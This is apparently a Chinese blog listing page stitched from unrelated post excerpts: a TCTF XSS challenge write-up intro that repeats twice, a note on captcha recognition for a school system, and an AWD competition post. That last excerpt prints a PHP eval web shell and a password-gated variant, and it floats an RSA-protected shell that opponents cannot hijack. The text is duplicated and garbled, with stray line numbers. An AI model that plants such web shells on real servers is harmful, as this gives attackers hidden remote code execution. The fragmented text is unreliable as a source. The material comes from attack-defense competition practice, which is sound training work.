启
有幸参加了这次TCTF,还好没有垫底,打破了队友web是做不出来的
的flag
除了空调,感觉还行。
肝了web2 ,是一个xss
目前这个题目还是在线的 h4x0rs.date
解
一个很明显的 xss 题
有幸参加了这次TCTF,还好没有垫底,打破了队友web是做不出来的
的flag
除了空调,感觉还行。
肝了web2 ,是一个xss
目前这个题目还是在线的 h4x0rs.date
一个很明显的 xss 题
在某次教育SRC的报告中
我校的教务处系统登录增加了一个验证码
作为一个懒人, 并且有服务需要调用教务处系统
就感觉很难受
曾经有写过一个验证码识别 —> 简单的验证码识别
不过, 如今有更加简单的方式
在现在awd赛中,在目标机中马往往是很重要的一件事。1
<?php @eval($_POST[x]);
但是这样简单的一句话,自己用很方便,不过也会被对手所使用。
接下来 有这种过滤的方式1
2
3<?php
if (md5($_POST['key']) === 'b995b8fab13acb0a805d97ebbdb8e6cb')
@eval($_POST[x]);
通过key来保证. 这个马只能被自己使用.
不过只要对方在这个文件中 部署一个流量采集 就会轻松获取你所发送的payload,并可以利用你的获取你的key来攻击别的受害机.
所以说,需要一种人对方完全无法利用的小马。我想到是利用RSA加密所需的数据。